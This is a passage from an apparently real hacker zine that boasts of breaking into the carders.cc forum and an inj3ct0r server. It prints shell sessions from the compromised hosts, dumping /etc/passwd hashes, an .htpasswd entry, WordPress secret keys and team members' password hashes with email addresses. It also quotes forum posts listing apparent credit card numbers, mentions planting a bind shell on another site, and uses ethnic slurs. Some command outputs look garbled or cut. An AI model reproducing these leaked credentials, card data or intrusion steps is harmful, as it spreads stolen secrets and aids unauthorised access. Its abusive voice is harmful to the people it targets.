(;p). + +We owned offsec including backtrack and exploit-db because they are +fucking security "expert" maggots (oops s/m/f/) who just fail so hard +at security that we wonder why people really take their training +courses. We imagine it's like open mic night at the laughatorium. + +We owned inj3ct0r because they are lameass wannabe milw0rm kids whose +sole purpose in life is to disclose XSS 0dayz in Joomla (RSnake +anyone?). + +We owned carders.cc (AGAIN) because they are unable to learn from +their mistakes and keep spreading garbage around the underground. + +We owned free-hack because they are developing into one of the +largest, most arrogant script-kiddie breeding grounds on the +intertubez. + +,_._._._._._._._|____________________________________________________ +|_|_|_|_|_|_|_|_|___________________________________________________/ + ~ carders.cc ~ ! + +Here we go again. We hope that everybody was looking forward to see +carders.cc getting owned again. We kept our word, didn't we? Let us +begin: + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| The ninja guys piss on you and your half trained monkeys or | +| whatever your leet underground team consists of. If you continue, | +| you will be owned over again and rm'd twice. Also we will punch | +| you in the face. | +|____________________________________________________________________| + +Our lazy ninja squad was too drunk to come over and punch you in the +fucking face. So we'll just stick to owning you for now. Carders.cc +went down for a few days, but came back as if nothing had happened. +They switched some server admins and installed some new software in +the hopes that they would be safe. They turned on some l33t "security" +settings like PHP's "Safe Mode" and "Openbase Dir", and they also +disabled lots of functions. All in all they thought they were pretty +locked down. Well, obviously they were fucking wrong. It's hard to +harden a system when everything is backdoored and unfortunately we are +just too ninja to get stopped by your silly protections. You can never +stop us. We will always keep owning and exp0sing you. + +No. Matter. What. You. Try. + +$ uname -a +FreeBSD sec1560.2x4.ru 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:02:08 UTC 2009 root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64 + +$ id +uid=1000(carderscc) gid=1000(carderscc) groups=1000(carderscc) + +$ w + 1:24AM up 11 days, 4:23, 0 users, load averages: 0.37, 0.48, 0.54 +USER TTY FROM LOGIN@ IDLE WHAT + +$ alias ls="ls -la" + +$ ls + +total 47 +drwxr-xr-x 17 root wheel 512 Jul 3 19:12 . +drwxr-xr-x 17 root wheel 512 Jul 3 19:12 .. +-rw-r--r-- 1 root wheel 798 Jan 18 2010 .cshrc +-rw-r--r-- 1 root wheel 265 Jan 18 2010 .profile +-r--r--r-- 1 root wheel 6206 Jan 18 2010 COPYRIGHT +-rw-r--r-- 1 root wheel 0 Jul 3 19:12 a +drwxr-xr-x 2 root wheel 1024 Jan 18 2010 bin +drwxr-xr-x 7 root wheel 512 Jan 18 2010 boot +dr-xr-xr-x 5 root wheel 512 Nov 24 21:14 dev +drwxr-xr-x 22 root wheel 2560 Nov 1 23:54 etc +drwxr-x--x 4 root wheel 512 Nov 1 23:54 home +drwxr-xr-x 3 root wheel 1536 Jan 18 2010 lib +drwxr-xr-x 2 root wheel 512 Apr 4 2010 libexec +drwxr-xr-x 2 root wheel 512 Jan 18 2010 media +drwxr-xr-x 2 root wheel 512 Jan 18 2010 mnt +dr-xr-xr-x 1 root wheel 0 Dec 6 00:58 proc +drwxr-xr-x 11 root wheel 1024 Nov 8 20:33 root +drwxr-xr-x 2 root wheel 2560 Jan 18 2010 sbin +lrwxr-xr-x 1 root wheel 11 Jan 18 2010 sys -> usr/src/sys +drwxrwxrwt 11 root wheel 512 Dec 5 23:42 tmp +drwxr-xr-x 15 root wheel 512 Jan 18 2010 usr +drwxr-xr-x 23 root wheel 512 Nov 24 21:14 var + +$ cat /etc/passwd +# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $ +# +root:*:0:0:Charlie &:/root:/bin/csh +toor:*:0:0:Bourne-again Superuser:/root: +daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin +operator:*:2:5:System &:/:/usr/sbin/nologin +bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin +tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin +kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin +games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin +news:*:8:8:News Subsystem:/:/usr/sbin/nologin +man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin +sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin +smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin +mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin +bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin +proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin +_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin +_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin +uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico +pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin +www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin +nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin +mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin +postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin +carderscc:*:1000:1000:User &:/home/carderscc:/sbin/nologin +cardersblog:*:1001:1001:User &:/home/cardersblog:/usr/sbin/nologin + +$ cd /root + +$ ls +total 412628 +drwxr-xr-x 11 root wheel 1024 Nov 8 20:33 . +drwxr-xr-x 17 root wheel 512 Jul 3 19:12 .. +-rw------- 1 root wheel 1856 Dec 5 23:53 .bash_history +-rw-r--r-- 1 root wheel 798 Jan 18 2010 .cshrc +-rw------- 1 root wheel 2909 Dec 7 22:31 .history +-rw-r--r-- 1 root wheel 155 Jan 18 2010 .k5login +-rw------- 1 root wheel 61 Jul 5 21:44 .lesshst +-rw-r--r-- 1 root wheel 303 Jan 18 2010 .login +drwx------ 3 root wheel 512 Dec 6 02:34 .mc +-rw------- 1 root wheel 641 Nov 8 20:33 .mysql_history +-rw-r--r-- 1 root wheel 265 Jan 18 2010 .profile +drwx------ 2 root wheel 512 Nov 7 17:20 .ssh +-rw-r--r-- 1 root wheel 417314245 Oct 24 21:13 24_10_2010_carderscc_01.sql +drwxr-xr-x 3 root wheel 512 Jul 3 00:34 backup +drwxr-xr-x 4 root wheel 512 Nov 8 17:58 backups +drwxr-xr-x 2 root wheel 512 Jul 20 2009 crack +-rw-r--r-- 1 root wheel 3223 Jul 20 2009 crack.zip +-rw-r--r-- 1 root wheel 85 Aug 9 03:31 ddos.php +-rw-r--r-- 1 root wheel 168 Feb 1 2010 example.php +drwxr-xr-x 3 root wheel 512 Jul 5 00:41 greensql +-rw-r--r-- 1 root wheel 20 Aug 9 03:26 info.php +-rw------- 1 root wheel 16877 Jul 29 20:44 mbox +drwxr-xr-x 3 root wheel 512 Jul 3 18:59 php +drwxr-xr-x 14 carderscc carderscc 1536 Nov 2 16:15 proftpd-1.3.3c +-rw-r--r-- 1 root wheel 4885847 Oct 29 17:27 proftpd-1.3.3c.tar.gz +drwxr-xr-x 2 root wheel 512 Nov 8 18:50 stylebackup + +Mad PHP-Codez again! + +$ cat ddos.php + + +$ cat info.php + + +$ cat example.php + + +$ cd /home/carderscc + +$ ls +total 18 +drwxr-x--- 7 carderscc www 512 Nov 18 20:45 . +drwxr-x--x 4 root wheel 512 Nov 1 23:54 .. +dr-xr-x--- 18 carderscc www 2560 Nov 12 23:32 carders.cc +drwxrwxr-x 2 carderscc www 512 Dec 2 00:34 jabber.carders.cc +drwxrwxr-x 11 carderscc www 3072 Nov 8 17:27 pma +drwxrwxrwx 2 carderscc www 2048 Dec 6 00:40 temp +drwxrwxr-x 5 carderscc www 512 Nov 6 19:47 vbseo + +$ cd carders.cc + +$ ls +total 2286 +dr-xr-x--- 18 carderscc www 2560 Nov 12 23:32 . +drwxr-x--- 7 carderscc www 512 Nov 18 20:45 .. +-r-xr-x--- 1 carderscc www 1107 Dec 5 15:34 .htaccess +-r-xr-x--- 1 carderscc www 20 Nov 12 18:16 .htpasswd +dr-xr-x--- 4 carderscc www 2048 Nov 18 21:17 admincp +-r-xr-x--- 1 carderscc www 40115 Oct 29 20:53 ajax.php +-r-xr-x--- 1 carderscc www 75525 Oct 29 20:53 album.php +-r-xr-x--- 1 carderscc www 19041 Oct 29 20:52 announcement.php +dr-xr-x--- 2 carderscc www 512 Oct 29 22:39 archive +-r-xr-x--- 1 carderscc www 8668 Oct 29 20:52 asset.php +-r-xr-x--- 1 carderscc www 20406 Oct 29 20:52 assetmanage.php +-r-xr-x--- 1 carderscc www 15710 Oct 29 20:52 attachment.php +-r-xr-x--- 1 carderscc www 6658 Oct 29 20:52 attachment_inlinemod.php +-r-xr-x--- 1 carderscc www 3449 Oct 29 20:52 blog_attachment.php +-r-xr-x--- 1 carderscc www 96043 Oct 29 20:53 calendar.php +-r-xr-x--- 1 carderscc www 43 Oct 29 20:52 clear.gif +dr-xr-x--- 9 carderscc www 3584 Nov 2 00:32 clientscript +-r-xr-x--- 1 carderscc www 15270 Oct 29 20:52 converse.php +dr-xr-x--- 7 carderscc www 512 Nov 2 00:33 cpstyles +-r-xr-x--- 1 carderscc www 3231 Oct 29 20:52 cron.php +-r-xr-x--- 1 carderscc www 5139 Oct 29 20:52 css.php +dr-xr-x--- 3 carderscc www 512 Nov 2 00:33 customavatars +dr-xr-x--- 3 carderscc www 512 Nov 2 00:33 customgroupicons +dr-xr-x--- 2 carderscc www 512 Nov 2 00:33 customprofilepics +-r-xr-x--- 1 carderscc www 1707 Oct 29 20:52 editor.php +-r-xr-x--- 1 carderscc www 46932 Oct 29 20:53 editpost.php +-r-xr-x--- 1 carderscc www 1326 Oct 29 20:52 entry.php +-r-xr-x--- 1 carderscc www 30006 Oct 29 20:53 external.php +-r-xr-x--- 1 carderscc www 9888 Oct 29 20:52 faq.php +-r-xr-x--- 1 carderscc www 5430 Jul 29 15:42 favicon.ico +-r-xr-x--- 1 carderscc www 22568 Oct 29 20:53 forum.php +-r-xr-x--- 1 carderscc www 42374 Oct 29 20:53 forumdisplay.php +-r-xr-x--- 1 carderscc www 1988 Oct 29 20:52 global.php +-r-xr-x--- 1 carderscc www 155760 Oct 29 20:54 group.php +-r-xr-x--- 1 carderscc www 26072 Oct 29 20:53 group_inlinemod.php +-r-xr-x--- 1 carderscc www 11470 Oct 29 20:53 groupsubscription.php +-r-xr-x--- 1 carderscc www 8961 Oct 29 20:53 image.php +dr-xr-x--- 28 carderscc www 1536 Nov 22 16:54 images +dr-xr-x--- 9 carderscc www 6144 Nov 6 19:47 includes +-r-xr-x--- 1 carderscc www 2318 Oct 29 20:53 index.php +-r-xr-x--- 1 carderscc www 46943 Oct 29 20:53 infraction.php +-r-xr-x--- 1 carderscc www 187725 Oct 29 20:54 inlinemod.php +-r-xr-x--- 1 carderscc www 23934 Jul 29 21:10 invites.php +-r-xr-x--- 1 carderscc www 6778 Aug 14 08:15 itrader.php +-r-xr-x--- 1 carderscc www 14964 Aug 14 08:15 itrader_detail.php +-r-xr-x--- 1 carderscc www 13515 Aug 14 08:15 itrader_feedback.php +-r-xr-x--- 1 carderscc www 1405 Aug 14 08:15 itrader_global.php +-r-xr-x--- 1 carderscc www 22171 Aug 14 08:15 itrader_main.php +-r-xr-x--- 1 carderscc www 3970 Aug 14 08:15 itrader_report.php +-r-xr-x--- 1 carderscc www 11362 Oct 29 20:53 joinrequests.php +-r-xr-x--- 1 carderscc www 1643 Oct 29 20:53 list.php +-r-xr-x--- 1 carderscc www 10869 Oct 29 20:53 login.php +dr-xr-x--- 2 carderscc www 512 Nov 2 00:33 madp +-r-xr-x--- 1 carderscc www 30166 Oct 29 20:53 member.php +-r-xr-x--- 1 carderscc www 16314 Oct 29 20:53 member_inlinemod.php +-r-xr-x--- 1 carderscc www 40267 Oct 29 20:53 memberlist.php +-r-xr-x--- 1 carderscc www 22186 Oct 29 20:53 misc.php +dr-xr-x--- 2 carderscc www 512 Nov 6 19:48 modcp +-r-xr-x--- 1 carderscc www 76749 Oct 29 20:53 moderation.php +-r-xr-x--- 1 carderscc www 6701 Oct 29 20:53 moderator.php +-r-xr-x--- 1 carderscc www 17474 Oct 29 20:53 newattachment.php +-r-xr-x--- 1 carderscc www 41001 Oct 29 20:53 newreply.php +-r-xr-x--- 1 carderscc www 20107 Oct 29 20:53 newthread.php +-r-xr-x--- 1 carderscc www 21724 Oct 29 20:53 online.php +dr-xr-x--- 5 carderscc www 512 Nov 2 00:33 packages +-r-xr-x--- 1 carderscc www 8018 Oct 29 20:53 payment_gateway.php +-r-xr-x--- 1 carderscc www 13282 Oct 29 20:53 payments.php +-r-xr-x--- 1 carderscc www 3984 Oct 29 20:53 picture.php +-r-xr-x--- 1 carderscc www 16587 Oct 29 20:53 picture_inlinemod.php +-r-xr-x--- 1 carderscc www 26091 Oct 29 20:53 picturecomment.php +-r-xr-x--- 1 carderscc www 29260 Oct 29 20:53 poll.php +-r-xr-x--- 1 carderscc www 10336 Oct 29 20:53 posthistory.php +-r-xr-x--- 1 carderscc www 76507 Oct 29 20:54 postings.php +-r-xr-x--- 1 carderscc www 7009 Oct 29 20:53 printthread.php +-r-xr-x--- 1 carderscc www 79357 Oct 29 20:54 private.php +-r-xr-x--- 1 carderscc www 163617 Oct 29 20:55 profile.php +-r-xr-x--- 1 carderscc www 56285 Oct 29 20:54 register.php +-r-xr-x--- 1 carderscc www 7216 Oct 29 20:53 report.php +-r-xr-x--- 1 carderscc www 14687 Oct 29 20:53 reputation.php +-r-xr-x--- 1 carderscc www 34539 Oct 29 20:54 search.php +-r-xr-x--- 1 carderscc www 22632 Oct 29 20:54 sendmessage.php +-r-xr-x--- 1 carderscc www 12407 Oct 29 20:54 showgroups.php +-r-xr-x--- 1 carderscc www 12660 Oct 29 20:54 showpost.php +-r-xr-x--- 1 carderscc www 80037 Oct 29 20:54 showthread.php +dr-xr-x--- 2 carderscc www 512 Nov 2 00:33 signaturepics +dr-xr-x--- 2 carderscc www 512 Nov 2 00:32 store_sitemap +-r-xr-x--- 1 carderscc www 38784 Oct 29 20:54 subscription.php +-r-xr-x--- 1 carderscc www 5321 Oct 29 20:54 tags.php +-r-xr-x--- 1 carderscc www 8722 Oct 29 20:54 threadrate.php +-r-xr-x--- 1 carderscc www 11068 Oct 29 20:54 threadtag.php +-r-xr-x--- 1 carderscc www 61 Oct 29 20:52 uploadprogress.gif +-r-xr-x--- 1 carderscc www 39639 Oct 29 20:54 usercp.php +-r-xr-x--- 1 carderscc www 20956 Oct 29 20:54 usernote.php +-r-xr-x--- 1 carderscc www 16518 Jul 29 16:35 vaispy.php +dr-xr-x--- 13 carderscc www 1024 Nov 2 00:32 vb +dr-xr-x--- 4 carderscc www 512 Nov 6 19:48 vbseo +-r-xr-x--- 1 carderscc www 45239 Nov 6 19:48 vbseo.php +-r-xr-x--- 1 carderscc www 4112 Nov 6 19:47 vbseocp.php +-r-xr-x--- 1 carderscc www 27801 Oct 29 20:54 visitormessage.php +-r-xr-x--- 1 carderscc www 1647 Oct 29 20:54 widget.php +-r-xr-x--- 1 carderscc www 3769 Oct 29 20:54 xmlsitemap.php + +$ cat .htpasswd +ddos:XScRLnTwdeJ6k + +$ cat includes/config.php + usr/src/sys +drwxrwxrwt 11 root wheel 512 Dec 5 23:42 tmp +drwxr-xr-x 15 root wheel 512 Jan 18 2010 usr +drwxr-xr-x 23 root wheel 512 Nov 24 21:14 var + +?> + +$ cd /home/cardersblog + +$ ls +total 8 +drwxr-xr-x 4 cardersblog www 512 Nov 2 01:16 . +drwxr-x--x 4 root wheel 512 Nov 1 23:54 .. +dr-xr-x--- 5 cardersblog www 1024 Nov 21 00:18 blog.carders.cc +drwxrwxrwx 2 cardersblog www 512 Nov 2 01:16 temp + +$ cd blog.carders.cc + +$ ls +total 2928 +dr-xr-x--- 5 cardersblog www 1024 Nov 21 00:18 . +drwxr-xr-x 4 cardersblog www 512 Nov 2 01:16 .. +-rw-r--r-- 1 cardersblog www 188 Nov 21 00:18 .htaccess +-r-xr-x--- 1 cardersblog www 397 Aug 27 17:22 index.php +-r-xr-x--- 1 cardersblog www 2683109 Jul 18 16:06 latest.tar.gz +-r-xr-x--- 1 cardersblog www 15410 Aug 27 17:22 license.txt +-r-xr-x--- 1 cardersblog www 9122 Aug 27 17:22 readme.html +-r-xr-x--- 1 cardersblog www 4391 Aug 27 17:22 wp-activate.php +dr-xr-x--- 7 cardersblog www 2560 Jul 18 16:06 wp-admin +-r-xr-x--- 1 cardersblog www 40284 Aug 27 17:23 wp-app.php +-r-xr-x--- 1 cardersblog www 220 Aug 27 17:23 wp-atom.php +-r-xr-x--- 1 cardersblog www 274 Aug 27 17:23 wp-blog-header.php +-r-xr-x--- 1 cardersblog www 3926 Aug 27 17:23 wp-comments-post.php +-r-xr-x--- 1 cardersblog www 238 Aug 27 17:23 wp-commentsrss2.php +-r-xr-x--- 1 cardersblog www 3173 Aug 27 17:23 wp-config-sample.php +-r-xr-x--- 1 cardersblog www 3506 Jul 31 14:20 wp-config.php +dr-xr-x--- 6 cardersblog www 512 Aug 27 18:05 wp-content +-r-xr-x--- 1 cardersblog www 1255 Aug 27 17:23 wp-cron.php +-r-xr-x--- 1 cardersblog www 240 Aug 27 17:23 wp-feed.php +dr-xr-x--- 7 cardersblog www 2560 Jul 18 16:06 wp-includes +-r-xr-x--- 1 cardersblog www 2002 Aug 27 17:23 wp-links-opml.php +-r-xr-x--- 1 cardersblog www 2441 Aug 27 17:23 wp-load.php +-r-xr-x--- 1 cardersblog www 26059 Aug 27 17:23 wp-login.php +-r-xr-x--- 1 cardersblog www 7774 Aug 27 17:23 wp-mail.php +-r-xr-x--- 1 cardersblog www 487 Aug 27 17:23 wp-pass.php +-r-xr-x--- 1 cardersblog www 218 Aug 27 17:23 wp-rdf.php +-r-xr-x--- 1 cardersblog www 316 Aug 27 17:23 wp-register.php +-r-xr-x--- 1 cardersblog www 218 Aug 27 17:23 wp-rss.php +-r-xr-x--- 1 cardersblog www 220 Aug 27 17:23 wp-rss2.php +-r-xr-x--- 1 cardersblog www 9177 Aug 27 17:23 wp-settings.php +-r-xr-x--- 1 cardersblog www 18695 Aug 27 17:23 wp-signup.php +-r-xr-x--- 1 cardersblog www 3702 Aug 27 17:23 wp-trackback.php +-r-xr-x--- 1 cardersblog www 94184 Aug 27 17:23 xmlrpc.php + +$ cat wp-config.php +/?7m8/r0!,o}+e:eQfZo;7W:h7av[E:0V['); +define('NONCE_KEY', '|R(!,}:(`utsK5kQ0$LoSd=e?X+C]bqBEp5WWbWLSb'); + +/**#@-*/ + +/** + * WordPress Database Table prefix. + * + * You can have multiple installations in one database if you give each a unique + * prefix. Only numbers, letters, and underscores please! + */ +$table_prefix = 'wp_'; + +/** + * WordPress Localized Language, defaults to English. + * + * Change this to localize WordPress. A corresponding MO file for the chosen + * language must be installed to wp-content/languages. For example, install + * de.mo to wp-content/languages and set WPLANG to 'de' to enable German + * language support. + */ +define ('WPLANG', ''); + +/** + * For developers: WordPress debugging mode. + * + * Change this to true to enable the display of notices during development. + * It is strongly recommended that plugin and theme developers use WP_DEBUG + * in their development environments. + */ +define('WP_DEBUG', false); + +/* That's all, stop editing! Happy blogging. */ + +/** Absolute path to the WordPress directory. */ +if ( !defined('ABSPATH') ) + define('ABSPATH', dirname(__FILE__) . '/'); + +/** Sets up WordPress vars and included files. */ +require_once(ABSPATH . 'wp-settings.php'); + +## + + + | + __________ | + _ __ _ | | | + /_\ / \ /_\ | | | + put shit =|= | // | =|= | | | + to shit ! \__/ ! | | | + carders.cc _ | | | + ___ | ___ //' | | | + [___] | _ :=| |=: __T_||_T__ |p= | | + | ~| | =)_)= | | [__________] | | | + | | | (_( |xXx| \_ _/ | | | + | | | )_) """"" \ / | | | + \___| V | | | | | + | `========, | | | | | +________`. .'_________________| |________|__________lc_| + `. .' (____) \ + _| |_... .;;;;;;;;. \ + (________);;;; :;;;;;;;;;;: + :::::::' '::::::::' HAPPY NINJA BATHROOM + +Team Member Passes: + +Vitali:28cf8ccb53f80f7e8fca5e781f2e6424:dusFzU/ZvUe;e@fx\\3>XIgN[yGx9[*:admin@carders.cc +Juri:9475264713e83164de106d099350ff97:pqfgN4x7P)5_}0-E+PsIJ\\=_o1|oV&:daafagafd@dadadagfasg.dsxc +Luigi:13ae8bfbd4fc44302fc6261f58dd583e:.u5//.-K4`u$lm00M3V}h:d397080@lhsdv.com +Poseidon:0c18d81bcfa2845490f75e785f0e2457:BG$vA-%K_X<=|nF:tiberiusus@carders.in + + +You guys dont get it, do you? We told you to fuck off and still you +did not listen. We are not sorry for doing it again. You deserve it. + + ____________________________________________________|_._._._._._._._, + \___________________________________________________|_|_|_|_|_|_|_|_| + ! ~ inj3ct0r ~ + +#`````````` ___ ____ ____ +#````______/```\__//```\__/____\ +#``_/```\_/``:```````````//____\ +#`/|``````:``:``..``````/````````\ W A R N I N G !!! DISCOVERED LAMER O_o +#|`|`````::`````::``````\````````/ +#|`|`````:|`````||`````\`\______/ +#|`|`````||`````||``````|\``/``| +#`\|`````||`````||``````|```/`|`\ 1) maybe you were wrong address, go Inj3ct0r.com +#``|`````||`````||``````|``/`/_\`\ +#``|`___`||`___`||``````|`/``/````\ +#```\_-_/``\_-_/`|`____`|/__/``````\ +#````````````````_\_--_/````\`````/ 2) Or you are not wrong address, then Fuck Off! +#```````````````/____```````````/ +#``````````````/`````\`````````/ +#``````````````\______\_______/ + +Attention. This ridiculous banner is *not* part of our zine. In fact +it is inj3ct0r's 404 page. We concluded that this banner perfectly +reflects their retardedness. Their knowledge about security is on the +same level as their ability to speak proper english. For those who +don't know: inj3ct0r is a clone of the old milw0rm project, +administered by some morons called "r0073r", "Sid3^effects" and "L0rd +CrusAd3r". They are not only an exploit-db, but also an arrogant +community of retarded turks and arabs which tell you how you to write +your stupid Perl SQL-Injection exploit. + +All their attention whoring about how they hacked Facebook was driving +us insane and all their moaning about how they have problems with the +law was just too ridiculous for us to let them continue existing. +Actually we did not find out what kind of law problems they actually +had. We did however discover how stupid these kids are and what crap +they are talking about in their private forum area's. Check it out: + +------------- +-0day 31337 privat Area +-10-24-2010, 05:08 PM Post by KnocKout: +- +-0-Day Credit Cards | Part 2(Only 31337 Prv.)- +- +-Hi My Brothers.. +- +-14367 4454-5454-5454-5445 1 232 12-2012 +-14375 5257-9555-0001-0933 1 082 03-2013 ADVANTAGE +-14376 5492-9495-5876-7382 1 280 01-2013 BONUS +-14391 5437-7122-6415-1343 1 334 07-2012 MAXЭMUM +-14392 5437-7122-6415-1343 1 334 07-2012 MAXЭMUM +-------------- +- +-0day 31337 privat Area +-10-17-2010, 04:36 PM Post by KnocKout: +- +-Default => Rapid,Hotfile,CC Requests.. +- +-hi my brothers, +-RapidShare, Hotfile Premium and Credit Card. Requests.. +- +-Please indicate your requests here, and I will send Pm.. +-------------- + +Not only they are sharing CC's, they also think of themselves as the +best hackerz on the planet. Here is how they talk about exploit-db and +offsec: + +------------- +-0day 31337 privat Area: +-07-19-2010, 10:05 PM Post by SeeMe: +- +-guys, a bind shell have been sent to offsec server and enforced the regarding ports to be open +- +-Port State Service Reason Product Version Extra info +-22 tcp open ssh syn-ack OpenSSH 5.4 protocol 2.0 +-80 tcp open http syn-ack Apache httpd 2.2.15 (Fedora) +-301 tcp filtered unknown no-response +-443 tcp open https syn-ack +-1072 tcp filtered unknown no-response +-1087 tcp filtered unknown no-response +-1100 tcp filtered unknown no-response +-1111 tcp filtered unknown no-response +-1117 tcp filtered unknown no-response +-1443 tcp filtered ies-lm no-response +-1718 tcp filtered unknown no-response +-1720 tcp filtered H.323/Q.931 no-response +-1900 tcp filtered upnp no-response +-2000 tcp filtered cisco-sccp no-response +-2041 tcp filtered interbase no-response +-2046 tcp filtered sdfunc no-response +-2382 tcp filtered ms-olap3 no-response +-3017 tcp filtered unknown no-response +-4129 tcp filtered unknown no-response +-4900 tcp filtered unknown no-response +-5060 tcp filtered sip admin-prohibited +-5555 tcp filtered freeciv no-response +-5560 tcp filtered isqlplus no-response +-6669 tcp filtered irc no-response +-8007 tcp filtered ajp12 no-response +-9102 tcp filtered jetdirect no-response +-10000 tcp open snet-sensor-mgmt syn-ack +-44443 tcp filtered coldfusion-auth no-response +- +-but I just can't connect back to it +- +-any idea! +------------- +- +-07-21-2010, 10:10 PM Post by SeeMe: +- +-This is a new technology for me how to gain credentials over HTTP TRACE and TRACK +-when it's enable on a webserver +- +-The TRACE/TRACK method was enabled on the server listed below: +- +-http://www.offensive-security.com:80/ +- +-[PHP]http://www.offensive-security.com/wp-content/themes/infocus/lib/scripts/prettyPhoto/js/jquery.prettyPhoto.js?ver=./2.9.2%20HTTP/1.1[/PHP] +- +- +-could gain view info from the link above +------------- +- +-07-30-2010, 12:26 AM Post by SeeMe: +- +-http://mobile.backtrack-linux.org/ +- +-exploited for good and not sure that will be able to back it up +- +-and I'm still heading for the main both sites, offsec.com and exploit-db +- +-After one month into the desert I'll be back infront of my computer on 15th of Agu +- +-and I'll prepare for a globel war +------------- + + +They are calling exploit-db "lamers-db" yet they don't see who the +real lamers are. Hardly surprising that the inj3ct0r team did not +manage their box themselves and instead gave their work to some fat +guy called "asker". But since he left his box rot with some half +updated shit, it was a child's play to tap in and root. + +$ uname -a +Linux wateam 2.6.26-2-686 #1 SMP Thu Sep 16 19:35:51 UTC 2010 i686 GNU/Linux + +$ id +uid=0(root) gid=0(root) groups=0(root) + +$ cd / + +$ ls -la +total 540 +drwxr-xr-x 22 root root 1024 Oct 3 22:04 . +drwxr-xr-x 22 root root 1024 Oct 3 22:04 .. +drwxr-xr-x 2 root root 3072 Oct 3 21:09 bin +drwxr-xr-x 4 root root 1024 Oct 3 21:10 boot +drwxr-xr-x 15 root root 3460 Oct 15 15:19 dev +drwxr-xr-x 68 root root 6144 Oct 20 17:44 etc +drwxr-x--x 37 root root 4096 Oct 20 17:45 home +drwxr-xr-x 2 root root 1024 Nov 3 2007 initrd +lrwxrwxrwx 1 root root 28 Jul 29 11:28 initrd.img -> boot/initrd.img-2.6.26-2-686 +lrwxrwxrwx 1 root root 28 Nov 24 2008 initrd.img.old -> boot/initrd.img-2.6.18-6-686 +drwxr-xr-x 12 root root 7168 Oct 3 21:09 lib +drwx------ 2 root root 12288 Nov 3 2007 lost+found +drwxr-xr-x 2 root root 1024 Nov 3 2007 media +drwxr-xr-x 2 root root 1024 Oct 28 2006 mnt +drwxr-xr-x 2 root root 1024 Nov 3 2007 opt +dr-xr-xr-x 154 root root 0 Oct 15 15:18 proc +drwxr-x--- 7 root root 1024 Oct 15 17:27 root +drwxr-xr-x 2 root root 6144 Oct 3 21:09 sbin +drwxr-xr-x 2 root root 1024 Sep 16 2008 selinux +drwxr-xr-x 2 root root 1024 Nov 3 2007 srv +drwxr-xr-x 11 root root 0 Oct 15 15:18 sys +drwxrwxrwt 7 root root 492544 Oct 24 19:03 tmp +drwxr-xr-x 12 root root 4096 Jul 29 11:22 usr +drwxr-xr-x 15 root root 4096 Oct 29 2009 var +lrwxrwxrwx 1 root root 25 Jul 29 11:28 vmlinuz -> boot/vmlinuz-2.6.26-2-686 +lrwxrwxrwx 1 root root 25 Nov 24 2008 vmlinuz.old -> boot/vmlinuz-2.6.18-6-686 + +$ cat /etc/passwd +root:1NMGwkEq76.BsjeYGuM106fIjuU.RS/:0:0:root:/root:/bin/bash +daemon:*:1:1:daemon:/usr/sbin:/bin/sh +bin:*:2:2:bin:/bin:/bin/sh +sys:*:3:3:sys:/dev:/bin/sh +sync:*:4:65534:sync:/bin:/bin/sync +games:*:5:60:games:/usr/games:/bin/sh +man:*:6:12:man:/var/cache/man:/bin/sh +lp:*:7:7:lp:/var/spool/lpd:/bin/sh +mail:*:8:8:mail:/var/mail:/bin/sh +news:*:9:9:news:/var/spool/news:/bin/sh +uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh +proxy:*:13:13:proxy:/bin:/bin/sh +www-data:*:33:33:www-data:/var/www:/bin/sh +backup:*:34:34:backup:/var/backups:/bin/sh +list:*:38:38:Mailing List Manager:/var/list:/bin/sh +irc:*:39:39:ircd:/var/run/ircd:/bin/sh +gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh +nobody:*:65534:65534:nobody:/nonexistent:/bin/sh +mysql:!:100:102:MySQL Server,,,:/var/lib/mysql:/bin/false +proftpd:!:101:65534::/var/run/proftpd:/bin/false +ftp:!:102:65534::/home/ftp:/bin/false +sshd:!:103:65534::/var/run/sshd:/usr/sbin/nologin +Debian-exim:!:104:104::/var/spool/exim4:/bin/false +krivopustov:1V5RSW94dbZ3zwhsovKB4V5hHgvLLF/:1002:1002:,,,:/home/krivopustov:/bin/bash +volosovets:1NMLjMXqhFedJgnjw0uBwdQ2jRFqbG0:1007:1007:,,,:/home/volosovets:/bin/bash +wapper:1c1iEEB/k591mvgQk8a5mbsZmPwY8Q1:1008:1008:,,,:/home/wapper:/bin/bash +jaguar:1NOCfawFB/TD6X9.hEmN9Mn0kg1G.s1:1011:1011:,,,:/home/jaguar:/bin/bash +postfix:!:105:106::/var/spool/postfix:/bin/false +popa3d:!:106:109::/var/lib/popa3d:/bin/false +asmer:1O2E8f0enwpuZw37FkNoe0MNSktFTd.:1012:1012:,,,:/home/asmer:/bin/bash +wateam:1cewmdLFokkbiLeLlHrL2NJnPdqpnR/:1013:1013:,,,:/home/wateam:/bin/bash +silentwarrior:1aDOI9IqA5BrDw1EBfH4Afm5TYRNe//:1014:1014:,,,:/home/silentwarrior:/bin/bash 